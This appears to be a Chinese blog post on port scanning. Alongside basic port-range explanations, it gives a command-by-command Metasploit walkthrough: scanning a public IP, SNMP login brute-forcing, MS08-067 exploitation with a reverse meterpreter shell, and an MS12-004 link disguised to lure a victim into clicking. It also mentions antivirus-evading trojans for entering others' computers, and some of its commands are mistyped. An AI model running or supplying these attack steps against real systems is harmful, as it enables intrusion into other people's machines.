端口扫描的功能_端口扫描的模块是什么样的

hacker|
235

什么是端口扫描?

端口扫描是指某些别有用心的人发送一组端口扫描消息,试图以此侵入某台计算机,并了解其提供的计算机网络服务类型(这些网络服务均与端口号相关)。端口扫描是计算机解密高手喜欢的一种方式。攻击者可以通过它了解到从哪里可探寻到攻击弱点。实质上,端口扫描包括向每个端口发送消息,一次只发送一个消息。接收到的回应类型表示是否在使用该端口并且可由此探寻其弱点。

扫描器是一种自动检测远程或本地主机安全性弱点的程序,通过使用扫描器可以不留痕迹地发现远程服务器的各种TCP端口的分配及提供的服务和它们的软件版本,这就能让人们间接的或直观的了解到远程主机所存在的安全问题。

详见 百度百科

x-scan 是怎么用的?

X-Scan

是一个很好的扫描工具。但是你想进入别人的电脑,光靠他是不行的,你得有个侵入工具,还需要做了免杀的木马。

如何用Metasploit扫描端口

一、调用Nmap进行扫描

进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)

二、MSF模块扫描

Use auxiliary/scanner/postscan/syn

先用搜索命令搜索有关端口扫描的工具:searchportscan

我们使用Use auxiliary/scanner/postscan/syn

看一下参数配置 showoptions

我们先来设置一下网卡

Set INTERFACE eth0

设置一下扫描的端口,我们这里来扫描80:set PORTS 80

设置扫描目标RHOSTS :set RHOSTS 119.63.37.149

在设置一下线程:set THREADS 100

看一下我们设置好的

这时候我们都设置好了,我们来攻击下,看看效果,用命令run进行攻击

缺点就是扫描的速度有点慢啊

MetaSploit SMB扫描获取系统信息

还是搜索一下smb:searchsmb

这次发现搜出来很多,我们用这个模块

Use auxiliary/scanner/smb/smb_version

看一下需要设置的参数

设定目标ip:set RHOSTS 192.168.188.140

在设置一下线程:set THREAD 10

然后run一下,查看结果

直接扫描出来小伙伴的系统还有主机名,速度不到1s,很快

也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200

MetaSploit服务识别

我们这里对SSH和FTP进行识别

在这里使用这个模块:use auxiliary/scanner/ssh/ssh_version

然后我们设置一下参数,这里讲设置好的参数截图看一下

Run一下看看结果,其实没有扫出来,好像是屏蔽了,但是用nmap却扫出来了ssh

在试一下ftp,用这个模块:use auxiliary/scanner/ftp/ftp_version

设置下参数

可以看到结果,也没有扫描出来;

MetaSploit SNMP扫描与枚举

搜索一下snmpuse auxiliary/scanner/snmp/snmp_login

看一下他的参数设置

这个参数还是很多的

设定一下目标

然后在run一下

枚举用这个模块

use auxiliary/scanner/snmp/snmp_enum

设置好目标和线程后run一下就可以

MetaSploit远程代码执行

搜索一下08-067,使用这个攻击载荷

use exploit/windows/smb/ms08_067_netapi

同样来看一下参数设置

我们只要设置一下目标就可以,然后我们需要一个载荷来反弹shell

set payload windows/meterpreter/reverse_tcp

然后设置参数

将LHOST 设置为自己的ip(对外攻击不要忘了段口转发)

比如说知道对面的系统是什么版本,可以指定targer,用target查看一下都有什么版本

设置一下目标,假设我们目标机器的系统为10:set target 10

这时候,我们再来看一下其参数设置,发现比以前完备了好多

08-067是不会自动识别系统版本的,但是其他的可以自动识别,所以用其他攻击载荷的时候可以不用设置

然后输入exploit进行攻击即可

这时候会出来一个meterpreter

我们在里面输入shell,就会反弹一个shell

这样整个攻击过程就完成了

MetaSploit MIDI文件解析远程代码执行

还是来搜索12-004

设置下本机ip set SRVHOST ip

然后攻击

会生成一个连接,但是这个链接容易让人发现,所以我们可以伪装下ip利用URIPATH参数就可以伪装

在设置时,会发现报红,因为4444端口被占用了,所以我们改下监听端口 set LPORT 5555

然后生成连接

只要目标点了这个链接,那么我们就会上线一个shell

说一下,目标点击后我们这边并没有反映,我们需要输下session查看当前会话,会找到上线的机子,连接上线的机子

Session –I 1(id)

然后输入shell就可以拿到shell

什么是系统端口扫描

端口是为了合理分配系统网络设备资源的一种方式,就是把一个总水管分成多个分水管来减少压力。减少程序排队的时间。

端口分为:

(1)公认端口(WellKnownPorts):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

(2)注册端口(RegisteredPorts):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

(3)动态和/或私有端口(Dynamicand/orPrivatePorts):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

端口扫描就是扫描当前系统打开的端口和什么程序关联或是什么程序在使用某一个端口。

通过端口扫描,可以知道系统有哪些程序在使用网络资源,也可以防止端口重用产生的冲突。

给自己的系统检测是很简单的,比如x-Scan这个软件,就有选项是针对自己的。或者你将要检测的IP设为127.0.0.1也可以,127.0.0.1代表本机。

0条大神的评论

发表评论